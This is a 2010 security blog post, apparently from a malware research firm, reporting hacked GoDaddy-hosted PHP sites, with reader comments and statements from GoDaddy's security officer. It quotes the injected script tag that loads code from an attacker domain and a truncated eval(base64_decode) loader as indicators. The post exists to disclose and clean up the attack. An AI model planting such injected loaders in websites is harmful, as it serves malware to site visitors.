GoDaddy sites hacked – myblindstudioinfoonline.com and Hilary Kneber

September 17, 2010 by 76 Comments

We can now confirm there is an undetermined number of sites hosted at GoDaddy that have been attacked and exploited. Our research is showing this is an ongoing issue that started within the last couple hours.

All the sites we’ve seen so far contain the following javascript added to all PHP files:

<script src="http://myblindstudioinfoonline.com/ll.php"

Which are generated by a very long eval(base64_decode line:

eval(base64_decode("aWYoZnVuY3Rpb....

Here is the malware entry our scanner is detecting:



Note that the domain myblindstudioinfoonline dot com (77.78.239.53) is not blacklisted, so it has the potential to infect a very larger of visitors, specifically visitors with outdated AV signatures and definitions.

What’s interesting is that the domain is registered by the same people responsible for the previous attacks at Godaddy, Bluehost, etc: Hillary Kneber:

Registrant Contact:
HardSoft, inc
Hilary Kneber hilarykneber@yahoo.com
7569468 fax: 7569468
29/2 Sun street. Montey 29
Virginia NA 3947
us

Administrative Contact:
Hilary Kneber hilarykneber@yahoo.com
7569468 fax: 7569468
29/2 Sun street. Montey 29
Virginia NA 3947
us

The following script should clean up any infected site: http://blog.sucuri.net/2010/05/simple-cleanup-solution-for-latest.html

UPDATES:

*Other domains being used in this attack: http://www3.security-power31.co.cc, http://www4.megaav-soft74.co.cc, etc.

**Any ISP/Hosting provider should block this IP: 77.78.239.53

We will post more details as we learn. Thanks to Peter Casier from http://www.blogtips.org/ for the help.

If you need help cleaning up your site, contact us at support@sucuri.net or at http://sucuri.net

Filed Under: godaddy, hacked, Malware, WordPress Tagged With: , , ,
About David Dede

Sucuri Security bot (crazy work) - Malware research updates, sucuri news and more.

  • Jan

    Just saw abstrusegoose.com comics got hit with this

  • Pingback: Tweets that mention GoDaddy sites hacked – myblindstudioinfoonline.com and Hilary Kneber | Sucuri -- Topsy.com

  • http://twitter.com/kernelpaniker @kernelpaniker

    And this come after a day and a half of Godaddy's hosting sites being down. Im over it and going to move. What a pain.
    My recent post Wildcard Subdomains on Godaddy and Parallelizable Requests

  • Pingback: GoDaddy sites hacked again

  • why peoplehack

    mine got hit again… a couple of months ago.. im with godaddy … wtf…

  • Pingback: WordPress Malware Issue? I’m A Little Concerned!

  • Todd Redfoot

    Go Daddy's Security team quickly identified the source of this afternoon's PHP exploit and expects to have the approximately 150 affected sites restored shortly. We are continuing to monitor for any related activity and appreciate customer feedback.

    As part of our investigation, Go Daddy has launched a fact-finding tool to collect information about your experience. If you suspect your site was impacted, please fill out our security submission form, located here – http://www.godaddy.com/securityissue.

    Thank you,
    Todd Redfoot
    Go Daddy Chief Information Security Officer

    • http://blog.sucuri.net dremeda

      Todd for clarification purposes, are you implying this is a PHP issue the community should be aware of? Care to disclose the details?

      Thanks,
      Dre Armeda
      Sucuri Security

      My recent post GoDaddy sites hacked – myblindstudioinfoonlinecom and Hilary Kneber

      • http://MichelleandCarlos.info MichelleandCarlos

        My site is now fixed without me doing anything to the site at all. I am assuming that Go Daddy fixed it.. hmmmm…. after I called them a second time and told them about this post they wanted the link and put me on hold for about 15 minutes. I will be calling tomorrow and getting my money back for the "scanner" that the tech support told me would help, and I will be investing in Sucuri, at least your $89 plan includes you guys fixing it for me. Go Daddy charges $79 and they told me after the scan I would get instructions as to how to fix it myself. Also they scan once a day you guys scan regularly through out the day. @ Dre what would you recommend for a hosting company that is integrated with WordPress?
        My recent post How to Backup TweetAdder Database a Marketing tool for Twitter Followers

        • http://blog.sucuri.net dremeda

          Hi, sorry that you're having some difficulties with your host right now. We'll do everything we can to help you and others during these malware outbreaks.

          I think the point that needs to be made is that this type of stuff happens. The problem we see across the industry is disclosure and resolution practices differ and in some cases fail tremendously.

          Security controls, mitigation, and remediation practices need to be standardized across the hosting industry to provide a minimum level of protection to end users across the spectrum of mass marketed products you see advertised.

          We do not give hosting recommendations here at Sucuri but a bit of Google research will net great results on the WordPress ready hosting services who seem to best mitigate risks.

          Hope that helps!

          Dre Armeda
          Sucuri Security
          My recent post GoDaddy sites hacked – myblindstudioinfoonlinecom and Hilary Kneber

      • http://www.mymodeltalk.com mykkal

        I really would like an answer to your question.

        Is this a Godaddy issue or a php community issue?

    • Todd Redfoot

      This issue was resolved at 1:16 am Eastern time this morning.

      • http://blog.sucuri.net dremeda

        Hi Todd, can you expand on the problem? We're still receiving reports from GoDaddy customers that their domains are infected.

        Thanks,
        Dre Armeda
        Sucuri Security

        My recent post GoDaddy sites hacked – myblindstudioinfoonlinecom and Hilary Kneber

        • http://MichelleandCarlos.info MichelleandCarlos

          Thanks Dre.

          Just some FYI for people calling into GoDaddy, I referenced this article just tell the tech guy on the phone to to blog.sucuri.net and let them know it explains your problem and that the Security Officer for Go Daddy has posted on that site.

          Also be aware that when tech support pulls up your site they will not see the redirect that is happening on your site because they are on a network behind a firewall that blocks that script. When I explained that to the tech guy on the phone he agreed "yes we are blocked from seeing certain things that is probably why I am not seeing what you see."

          This is further proven when I had my wife try to access our site at her job she did not see the redirect either, because her servers block it.

          Just some info for when you call.

          My recent post How to Backup TweetAdder Database a Marketing tool for Twitter Followers

        • Todd Redfoot

          An exploit affected PHP files on approximately 150 Go Daddy accounts Friday afternoon. Go Daddy's Security Team worked quickly to clean and restore these websites, however, we have detected additional customer sites that may currently be experiencing difficulties due to this same attack.

          Go Daddy's Security Team has identified the cause. Our forensics have determined malicious files are being uploaded via FTP to customer websites. Go Daddy is asking all customers who believe they have a problem to change their FTP passwords.

          Meantime, our team is working swiftly to restore all affected websites and appreciates customer feedback. Go Daddy will continue to monitor as long as it takes to ensure our customer accounts are clean.

          If you suspect your site was impacted, please fill out our security submission form, located here – http://www.godaddy.com/securityissue.

          Thank you,
          Todd Redfoot
          Go Daddy Chief Information Security Officer

  • Andrew

    Ahhhhhhh same here! Go daddy failed us again

  • Jim

    bah. The site I write for got hit too.

  • King Jerm

    My site got hit too! nappyafro.com…WTH?

  • http://twitter.com/GayPatriot @GayPatriot

    Ditto!

  • Andy

    My main website was hit with this as well. I haven't check out my other sites that are being hosted with GoDaddy yet.

  • Laura

    Thanks for the quick post. New I was hit a few hours ago, couldn't find anything on line about it yet. Went out to dinner & knew once I got back you would have info here. You did. You helped us in May too, thank you.
    Will fill out the godaddy form and hope they have it resolved soon. Thank you in advance for any other info you provide us here, as I know you will :)

  • Laura

    Thanks for the quick post. Knew I was hit a few hours ago, couldn't find anything on line about it yet. Went out to dinner & knew once I got back you would have info here. You did. You helped us in May too, thank you.

  • http://MichelleandCarlos.info MichelleandCarlos

    Happened to my blog it is being redirected to a bad site and if I try and log into my wordpress console it looks all weird. When I called GoDaddy customer support number they thought it was on my end, once I explained how it was doing it they agreed it was not me but still they had no idea this was going on. I am disappointed that tech line does not know this is going on. I was told to purchase a scanner from them for 79 to scan my site and try and fix it. Very very disappointed.
    My recent post How to Backup TweetAdder Database a Marketing tool for Twitter Followers

  • Pingback: ‘Copycat’ websites drive rise in fakes | lawyer

  • Laura

    The script worked for us, but it took 2 tires this time. Maybe I was impatient, I don't know. But we are good now and will keep an eye on it. Thanks!!

  • Pingback: Emergency Update! Check your Sites! | WritingPays.Me

  • http://www.excheap.com LiVivian

    Yes my site is hacked. please help!!!
    Is godaddy hosting safe?? I want to move!

  • Pingback: Tweets that mention GoDaddy sites hacked – myblindstudioinfoonline.com and Hilary Kneber | Sucuri -- Topsy.com

  • http://bravopua.com/ Bravo

    this post was made a few minutes before I saw it on my wordpress blog and forum

    godaddy fixed it, but they said it had to be something from my end…not sure if true

    2 different sql's with 2 different passwords, 1 I never used since creating

    thanks for the intel
    My recent post FREE online game coaching &amp help me BETA test

  • http://www.excheap.com LiVivian

    I use the same way that cleaning previous js code cleaned up this mal js code. thanks sucuri.net

  • http://momsword.org John

    GoDaddy didn't fix the issue. My site was fine on the 17th. I woke up a couple of hours ago , it is Sept. 18th and my site got the virus. I wrote an article about it and linked this website to the article.
    GoDaddy will fix the websites when people call in. I asked them to keep an eye on the server because this is a server issue and they said the usual "change your passwords because it is on your end, not ours"

    they need to take responsibility for their fault!

  • Pingback: BananaQ8.com Under Attack! | Banana Q8

  • Health Magazine

    Thank you. The script cleared the malware. The chrome browser no more showing the page reporting possible malware attack on our website.
    My recent post How to Avoid Burnout and Bring Back Childlike Happiness

  • http://www.blogtips.org Peter

    Here is a fast and secure way to check any PHP-based site (WordPress, Joomla, phpBB, Drupal,..) for this malware attack, and to cure it in a few seconds.
    My recent post GoDaddy sites hacked again

  • http://www.spicywallpapers.net janish j

    My site got hacked at godaddy.
    I was found that wp_config.php was updated with http://myblindstudioinfoonline.com/ll.php

    Please verify your wp-config.php in case your blog is infected…………
    My recent post Making of the song Love Mera Hit Hit from Billu Barber

    • http://www.blogtips.org Peter

      if your wp_config.php was infected, then there is a good chance ALL of your PHP files were infected!
      My recent post GoDaddy sites hacked again

  • http://www.iphone4jailbreak.org Sourish

    that means hackers can screw any DADDY . Always avoid Shared Hosting if you have a budding blog .

  • http://www.marketcalls.in Rajandran R

    Now I really hate those hackers! My site (www.marketcalls.in) too got hacked. Anyways restored to normal!

    Wasted 5 hours in recovery itself.
    My recent post Manshi RT – Realtime datafeed available for 3 months Trial

  • http://www.marketcalls.in Rajadnran R

    @Janish almost all the php pages got attacked… Scan you whope PHP pages
    My recent post Manshi RT – Realtime datafeed available for 3 months Trial

  • Pingback: Marketcalls » Blog Archive » Godaddy Sites got hacked… Uh I restored mine!

  • http://www.retailersforum.com Martin

    Our site just got hit last night — we contacted GoDaddy via email and are waiting for help.

    • http://www.blogtips.org Peter

      Don't wait. Either use the sucuri.net fix in this post, or use the script here
      My recent post GoDaddy sites hacked again

  • blkcatgal

    I called GoDaddy twice this morning and twice they told me they didn't have a problem and was not award of any problem.

    • http://www.blogtips.org Peter

      That is ballony. I was one of the first ones to notice the new hack, around midnight EU time last night.
      I immediately informed Godaddy. One hour later they confirmed on Twitter, they were aware and working on it.

      That is about 24 hrs ago…
      My recent post GoDaddy sites hacked again

    • http://www.blogtips.org Peter

      That is ballony. I was one of the first ones to notice the new hack, around midnight EU time last night.

      Godaddy confirmed by Twitter to me they were aware and working on it.

      Their tweet to me at 2 am EU time: "Hey, we're aware of the issues some users are having and assisting them to clean their files. Thank you for taking steps to assist as well."
      My recent post GoDaddy sites hacked again

  • Pingback: Cyclelicious Hacked! » Cyclelicious

  • levib

    my site got hacked a few hours ago. why? godaddy is not fixed it.
    but what can i do? how to fixed it or clean the malware code of all .php files by myself?

  • http://www.cancasa.com Cancasa

    After reading what you guys went through I feel I'm in good hands at Sucuri.
    These guys are always ahead of the game so just like to say thanks.

  • Jack

    Godaddy is currently not answering their tech support phone line. I guess they are swamped. I am losing some serious money today.

  • Pingback: WordPress hacked with myblindstudioinfoonline malware on Godaddy

  • Todd Redfoot

    An exploit affected PHP files on approximately 150 Go Daddy accounts Friday afternoon. Go Daddy's Security Team worked quickly to clean and restore these websites, however, we have detected additional customer sites that may currently be experiencing difficulties due to this same attack.

    Go Daddy's Security Team has identified the cause. Our forensics have determined malicious files are being uploaded via FTP to customer websites. Go Daddy is asking all customers who believe they have a problem to change their FTP passwords.

    Meantime, our team is working swiftly to restore all affected websites and appreciates customer feedback. Go Daddy will continue to monitor as long as it takes to ensure our customer accounts are clean.

    If you suspect your site was impacted, please fill out our security submission form, located here – http://www.godaddy.com/securityissue.

    Thank you,
    Todd Redfoot
    Go Daddy Chief Information Security Officer

  • Pingback: Researchers from Sucuri Security, a company running a web integrity monitoring servic - Supreme HUB - The Expert Talks

  • http://www.smssarkar.com Rohit

    yes, go daddy is not answering any phones..

    here is a neat fix. http://alltips.in/how-to-fix-godaddy-malware-atta

  • Pingback: Cyclelicious Hacked! « Bike Monkey Magazine

  • http://twitter.com/GoDaddy @GoDaddy

    Rohit,

    Our 24/7 phone support team is always available to take your calls at 480.505.8877. You can also check the wait time at http://x.co/5woY , which is currently 2 minutes.

    ^Salem

    • http://smssarkar.com Rohit

      thanks but i have resolved the issue by myself.

  • http://www.mp3gle.in Erik

    I get the same problema. See http://www.mp3gle.in

  • http://www.mymodeltalk.com mykkal

    Good info. thanks

  • Ganesh Babu

    good post.. will surely help those whu were infected
    My recent post PlayStation Move

  • http://www.chinesesong.org/ janok

    my site has been hacked at godaddy

    it's not a wordpress site. how to fix it?
    My recent post LyricCowboys are busy-Jay ChouZhou Jielun

  • Steve

    This attack have anything to do with Network Solutions not permitting us to htttp for upgrades right now from our WordPress dashboards? We've been totally shut off. Can not upgrade WordPress can not upgrade plugins.

    Total frsutration

  • Steve

    This attack have anything to do with Network Solutions not permitting us to htttp for upgrades right now from our WordPress dashboards? We've been totally shut off. Can not upgrade WordPress can not upgrade plugins.

  • steve

    Of course this had to happen just as I had to do a new WP install yesterday and get busy with upgrading themes and plugin's what have you that require external sources to complete. So here I am stuck and unable to do anything other then WAIT. Let me see, would a VPS setup help protect me from unauthorized interruptions such as this or is that "dreaming" also.

  • Todd Redfoot

    The exploit affecting PHP files on several Go Daddy accounts this past weekend has been resolved.

    Go Daddy's Security Team worked quickly to clean and restore all affected sites. The exploit was caused by mailicious files uploaded via FTP to customer websites.

    As a good security practice, Go Daddy recommends all customers change their FTP passwords on a regular basis. To modify your FTP password please follow the steps provided in our help documentation at http://gdhelp.godaddy.com/article/6

    As always, Go Daddy's Security Team is here for you. If you ever suspect your site is under attack, please fill out our security submission form, located here – http://www.godaddy.com/securityissue – and notify Go Daddy's 24/7 Customer Support.

    Thank you,
    Todd Redfoot
    Go Daddy Chief Information Security Officer

    • blkcatgal

      Todd, can you explain to me why when I contacted GoDaddy Customer Support 3 times on 9/18/10 advising them that I thought there was a problem with my site, I was told each time they were not aware of any problems with any sites hosted by GoDaddy.

  • Todd Redfoot

    The Help Article which explains how users can change their FTP password was incorrectly linked.

    Please find the article here: http://help.godaddy.com/article/6

  • http://bourgy.com Steupz

    Why are GoDaddy still pretending these hacks are linked to its customers when it's an exploit at their end.
    Not blaming them because I am certain they are doing their best to avoid these attacks, but it's not a client issue.

    I advise everyone here to have a CRON job running on the hour using sucuri's script
    My recent post Legend Hunters- Fantasia For Real 2- La La’s Full Court Wedding And Supernatural

  • Pingback: Wordpress hackeado

  • Pingback: Social Media – the New Exploit Frontier | The ThreatSTOP Blog

  • Pingback: Cyber Arms Intelligence Report for September 20th « CYBER ARMS – Computer Security

  • Pingback: GoDaddy hacked – Fixing the “headers already sent” error | Sucuri

  • Giuliastro

    I agree with Steupz. This is clearly a script injection not someone stealing FTP passwords. We upgraded our blog, disabled all plugins and changed our FTP passwords but the problem is coming up every day, always at the same time. A CRON job is a good idea, but it's obviously a joke what is going on.

  • Pingback: Crisis, negocios y dinero

  • Godad

    I thought they were protected by WAF, what a laugh.